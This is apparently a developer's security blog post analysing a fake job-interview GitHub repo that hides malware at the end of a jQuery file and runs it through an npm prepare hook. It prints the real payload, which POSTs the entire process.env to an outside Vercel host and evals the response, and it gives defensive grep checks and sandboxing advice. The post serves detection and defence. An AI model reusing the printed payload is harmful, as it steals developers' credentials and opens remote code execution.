They Sent Me a Malicious GitHub Repo Disguised as a Job Interview
How targeted developer attacks hide in plain sight.
I almost missed it.
The repo looked fine. Node/Express backend, React frontend, some Solidity contracts, Moralis integration. A Web3 presale platform -- exactly the kind of take-home project a crypto startup might send you. Clean README, reasonable architecture, sensible dependencies. I audited it file by file: server.js, auth.js, router.js, db.js, all the route handlers. Standard stuff. A few code quality issues but nothing alarming.
Then I hit config/utils/libs/search.min.js.
The file is 10,000 lines long. The first 9,980 are the complete, unmodified source of jQuery 3.7.1 -- a real, legitimate library. At the very end, appended after all of it:
const axios = require('axios');
const host = "locate-my-ip.vercel.app";
const apikey = "3aeb34a31";
axios.post(`https://${host}/api/ip-check-encrypted/${apikey}`, {
...process.env
}).then((response) => { eval(response.data); });
Two attacks. Your entire environment exfiltrated to an attacker-controlled server. Then eval(response.data) -- whatever JavaScript the server sends back gets executed immediately. Every secret in your shell. Every API key. Every credential that was set in your environment when you typed npm install. Gone. And a persistent backdoor for them to push arbitrary code to your machine whenever they want.
This is what targeted developer attacks actually look like. Not some sketchy ZIP file with an obvious payload. A complete, functional-looking application with the malicious code buried in a file designed to never be read.
The Threat Is Real and Growing
This isn't hypothetical. Campaigns targeting developers through fake job interviews and take-home projects have been documented extensively since at least 2022, accelerating into 2024 and 2025. Multiple campaigns specifically targeting crypto developers and Web3 engineers have been attributed to the Lazarus Group, a North Korean state-sponsored threat actor. Operation Dream Job. TraderTraitor. DeathNote. Different names, same playbook: get a developer to clone and run a repo by making it look like legitimate interview work.
The targeting is precise. Developers are valuable because they have access to production systems, private keys, internal credentials, and deployment pipelines. One compromised developer laptop can be a direct path to an eight-figure crypto theft. This isn't opportunistic malware spray -- it's a deliberate, patient attack on a specific class of target.
And unlike most malware campaigns, this one abuses something developers are trained to trust: GitHub repos with readable source code. The implicit assumption is that if you can read the code, you can evaluate it. That assumption is the attack surface.
How This Attack Works
The Camouflage Strategy
The repo I audited had seven clean files for every suspicious one. server.js was 30 lines of boilerplate Express. auth.js was textbook JWT middleware. db.js had the MongoDB connection commented out entirely. The route handlers were standard CRUD. Someone put real work into making the surrounding code look like a legitimate, if unfinished, project.
The malicious file was placed in config/utils/libs/ -- a path that reads as an internal utility directory. The .min suffix signals "this is a build artifact, don't read it." Naming it search.min.js and wrapping the payload in jQuery source is clever: if you do open the file, you'll see a massive wall of legitimate minified code and close it. Most people would stop there.
The file is required in presale.js:
const search = require('../../../config/utils/libs/search.min')
That require() call executes the module-level code immediately when the server loads -- not when the search function is called. You don't have to hit the /search endpoint. The exfiltration happens the moment node server.js runs.
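The load-time execution is easy to demonstrate. A minimal sketch of the structure -- the function below is a stand-in for requiring search.min.js, with the network call replaced by an array push:

```javascript
// Simulated version of the attack's shape: in the real repo the
// module-level code is the axios.post; here it just records a flag.
const sideEffects = [];

// Stand-in for requiring search.min.js. Node runs a module's top-level
// statements once, at require() time -- not when an export is later called.
function loadMaliciousModule() {
  // module-level code: executes at load time
  sideEffects.push('payload executed at load');
  // the innocuous export the app actually uses
  return { search: (q) => q.trim() };
}

// The moment of "require": the payload fires here, even though
// search() is never called.
const lib = loadMaliciousModule();
console.log(sideEffects.length); // 1 -- before any endpoint is hit
```

The same is true of any real CommonJS module: top-level statements run exactly once, at load, as a side effect of the require itself.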
The prepare Hook Problem
There's a second layer to this specific attack that I noticed before finding the payload. The package.json contains:
"prepare": "npm run server | react-scripts start"
The prepare lifecycle hook fires automatically during npm install. This means running npm install -- the first thing any developer does with a new repo, before reading a single line of code -- starts the Express server, which loads search.min.js, which fires the exfiltration request.
You don't even have to consciously run the app. npm install is the attack.
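Before any npm install, it's worth dumping the lifecycle hooks from package.json. A minimal sketch -- the hook names are npm's standard install/pack hooks, and the sample manifest mirrors the repo described in this article:

```javascript
// Sketch: surface npm lifecycle hooks from a package.json before installing.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepack', 'postpack'];

function lifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS
    .filter((name) => name in scripts)
    .map((name) => `${name}: ${scripts[name]}`);
}

// In practice, feed it the real file:
// lifecycleScripts(JSON.parse(require('fs').readFileSync('package.json', 'utf8')))
const pkg = {
  scripts: {
    prepare: 'npm run server | react-scripts start', // fires on npm install
    start: 'node server.js',
  },
};
console.log(lifecycleScripts(pkg)); // [ 'prepare: npm run server | react-scripts start' ]
```

Anything this prints is code that runs without you asking for it.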
The Exfiltration Payload
...process.env may be the most dangerous expression in JavaScript for this threat model. It spreads your entire environment into the POST body. What's in your environment when you're doing interview prep at your desk?
Your shell environment inherits everything: AWS keys if you've configured the CLI, SSH agent credentials, GitHub tokens if you use the CLI, any secrets from your dotfiles, .env files sourced into your shell, your actual MongoDB URI if you have projects running locally. Developers tend to have powerful credentials in their environment because they work with infrastructure. That's precisely why developers are the target.
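To see what a single ...process.env spread would hand over, enumerate your own environment. A rough sketch -- the name pattern below is illustrative, not exhaustive:

```javascript
// List environment variables that look like credentials --
// i.e. what a `...process.env` spread would send to the attacker.
const SECRET_PATTERN = /KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL/i;

function sensitiveEnvKeys(env) {
  return Object.keys(env).filter((k) => SECRET_PATTERN.test(k));
}

// Run against your real shell with: sensitiveEnvKeys(process.env)
// Against a sample environment:
const sample = {
  PATH: '/usr/bin',
  HOME: '/home/me',
  AWS_SECRET_ACCESS_KEY: 'would-be-exfiltrated',
  GITHUB_TOKEN: 'would-be-exfiltrated',
};
console.log(sensitiveEnvKeys(sample)); // [ 'AWS_SECRET_ACCESS_KEY', 'GITHUB_TOKEN' ]
```

If running that against your own shell prints more than a couple of names, that's the blast radius of one npm install.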
The request goes to locate-my-ip.vercel.app -- a Vercel-hosted endpoint. Vercel gives attackers legitimate HTTPS and a CDN-backed domain that won't trip basic network filters. The /api/ip-check-encrypted/ path and API-key structure make the call look like a third-party service integration to anyone glancing at the code.
The RCE Backdoor
The eval(response.data) half of this is arguably more dangerous than the initial exfiltration. It's a remote code execution channel that the attacker controls entirely. They can:
- Push a reverse shell after you've started the app
- Scan your filesystem for private keys, .env files, ~/.ssh, ~/.aws/credentials
- Install persistence mechanisms
- Pivot to your local network
- Wait. Run nothing for days. Execute when you're connected to a VPN or have accessed sensitive systems
The malicious code runs every time the server starts, not just once. Close the app, reopen it two weeks later, the backdoor phones home again and gets whatever payload the attacker decides to push that day.
What to Look For
The Minified File in Source Code
Minified files have no business being committed to a source repository. Build artifacts belong in dist/, build/, or generated at CI time. A .min.js file committed to src/, config/, lib/, or utils/ is a red flag -- always read it. A legitimate minified library can be verified against its published checksum. An unexpected one warrants full inspection regardless of how long it is.
The Deep Path Trick
config/utils/libs/search.min is three directories deep from the root. Attackers nest malicious files because humans audit top-level files more carefully than deeply nested ones. Grep the entire repo for require() calls before you run anything:
grep -r "require(" . --include="*.js" | grep -v node_modules
Check every path. If a require() points to a file you haven't read, read it.
Lifecycle Hooks
npm install is not a passive operation. The following package.json scripts execute automatically without any action beyond npm install or npm publish:
- prepare
- preinstall
- postinstall
- prepack
- postpack
Read all of them before running anything. postinstall is the most common vector -- it's designed for legitimate post-install setup like compiling native modules, but it's also the first place malicious repos hide execution. If a hook runs node, python, bash, or sh with anything other than a completely transparent build step, stop.
Use npm install --ignore-scripts to install dependencies without executing any lifecycle hooks. This lets you read the code before it can run.
Spread Environment Variables
Search for process.env in any repo you're auditing:
grep -r "process\.env" . --include="*.js" | grep -v node_modules
A legitimate app reads specific keys: process.env.DATABASE_URL, process.env.PORT. When you see ...process.env -- the spread operator applied to the entire environment object -- that's exfiltration. There is no legitimate reason for application code to spread your full environment into a function argument.
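The contrast is easy to see side by side. A sketch with hypothetical key names matching the examples above:

```javascript
// Legitimate: read specific, named keys with explicit fallbacks.
function loadConfig(env) {
  return {
    port: Number(env.PORT) || 3000,
    databaseUrl: env.DATABASE_URL || 'mongodb://localhost:27017/dev',
  };
}

// Exfiltration: the spread copies every key, known and unknown, unfiltered.
function exfilBody(env) {
  return { ...env }; // this is the red flag
}

const env = {
  PORT: '8080',
  DATABASE_URL: 'mongodb://db/prod',
  AWS_SECRET_ACCESS_KEY: 'leak-me',
};
console.log(Object.keys(loadConfig(env)));              // [ 'port', 'databaseUrl' ]
console.log('AWS_SECRET_ACCESS_KEY' in exfilBody(env)); // true -- secrets included
```

The legitimate version can only ever leak the keys it names. The spread version leaks whatever happens to be in your shell that day.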
Outbound HTTP in Unexpected Places
Network calls should live in well-defined service layers. A utility file in config/utils/ that makes an axios.post() is wrong. Search for all outbound HTTP calls:
grep -rn "axios\|fetch\|http\.request\|https\.request\|got\|needle\|request(" . --include="*.js" | grep -v node_modules
Verify every one. Check the domain against what the app is supposed to do. A presale frontend has no reason to POST to locate-my-ip.vercel.app.
eval() and Dynamic Execution
grep -rn "eval(\|new Function" . --include="*.js" | grep -v node_modules
eval(response.data) is about as explicit as a red flag gets, but attackers can obfuscate it. new Function(string)() is functionally equivalent. Dynamic require() calls -- a variable instead of a string literal inside require() -- can't be caught by a fixed grep pattern, so trace them by hand when you map the require graph. Any code that takes a string from the network and executes it is a backdoor by definition.
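The equivalence is worth seeing concretely, since it defeats a grep for eval alone:

```javascript
// new Function(string)() executes an arbitrary string exactly like eval does.
const payload = 'return 2 + 2;';

const viaFunction = new Function(payload)(); // compiles and runs the string
const viaEval = eval('2 + 2');               // the classic form

console.log(viaFunction, viaEval); // 4 4
```

Replace the arithmetic with response.data from an attacker's server and both lines are the same backdoor.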
Unicode Steganography
This deserves its own callout because it's genuinely invisible to code review. Researchers recently documented a campaign called Glassworm that hides malicious payloads in invisible Unicode variation selectors -- characters that render as nothing in every code editor and diff tool. The payload is invisible in GitHub's UI, invisible in your terminal, invisible in VS Code. A small decoder extracts and evals the hidden bytes.
Visual code review cannot protect you against this. You need tooling that scans for non-standard Unicode ranges. Run this on any untrusted repo:
grep -rPn "[\x{E0100}-\x{E01EF}\x{FE00}-\x{FE0F}]" . --include="*.js"
Or use a dedicated tool -- Aikido's scanner specifically targets this pattern.
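If grep -P isn't available (macOS ships BSD grep, which lacks it), the same scan is a few lines of Node. A sketch covering the two invisible ranges the grep above targets, U+FE00-U+FE0F and U+E0100-U+E01EF:

```javascript
// Scan a source string for invisible Unicode variation selectors.
function findInvisible(source) {
  const hits = [];
  for (let i = 0; i < source.length; i++) {
    const cp = source.codePointAt(i); // decodes astral-plane characters correctly
    if ((cp >= 0xfe00 && cp <= 0xfe0f) || (cp >= 0xe0100 && cp <= 0xe01ef)) {
      hits.push({ index: i, codePoint: 'U+' + cp.toString(16).toUpperCase() });
    }
    if (cp > 0xffff) i++; // skip the low surrogate of an astral code point
  }
  return hits;
}

const clean = 'const x = 1;';
const tainted = 'const x = 1;' + String.fromCodePoint(0xe0101); // renders as nothing
console.log(findInvisible(clean).length, findInvisible(tainted).length); // 0 1
```

Both strings look identical in an editor; only the scan tells them apart.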
The Defense Stack
Before touching the code at all: Read package.json scripts. Every single one. Check every direct dependency against the npm registry -- verify the name is spelled correctly (typosquatting is common), check when it was published, look at the weekly downloads. A package with 12 downloads published two weeks ago that happens to share a name with a popular library is a dependency confusion attack.
Before running npm install: Use npm install --ignore-scripts. Then read the codebase. grep -r "require(" and trace every import path. Look for minified files in non-build directories. Search for process.env, eval, and outbound HTTP.
When you do run it: Run it in a VM with no shared folders, no clipboard integration, and no network access to your LAN. Snapshot before running. Use a host-only or completely isolated network adapter. The VM should have nothing valuable in its environment -- empty credential files, no SSH keys loaded, no cloud CLI configured. The blast radius of a compromised VM with an isolated network is essentially zero.
If you need network access for the build: Allow it during dependency installation. Cut it before execution. Many of these payloads phone home on server start, so denying egress at runtime kills the exfiltration even if you missed the code.
Why This Keeps Working
Developers are trained to trust code review. The entire open source security model is built on the premise that readable source is reviewable source. These attacks subvert that assumption in a few specific ways: cognitive fatigue from large codebases, the convention that minified files are build artifacts, the assumption that the interesting code is in the application layer rather than in utility libraries.
There's also a social layer. You're reviewing this code because someone sent it to you as part of a job process. You want the job. You're under time pressure. The code looks legitimate because most of it is. The human tendency to pattern-match to "this looks like a normal project" is being exploited deliberately.
The repo I audited had 448 commits. A history. Contributors. A README with a features table and a deployment section. Someone spent time on this.
The correct mental model is: any repo you didn't write is untrusted code. The appropriate execution environment for untrusted code is the same whether it came from a stranger on the internet or a recruiter at a company you'd like to work for. Disposable VM, isolated network, nothing valuable in the environment.
npm install can be an attack. search.min.js can be a backdoor. A 10,000-line file is still worth reading if the last 20 lines are the ones that matter.
Found a malicious repo in the wild? The Aikido Security team and the OpenSSF malicious-packages project both accept reports. GitHub's security team at security@github.com takes these seriously. Report it -- the next person it gets sent to might not audit carefully enough.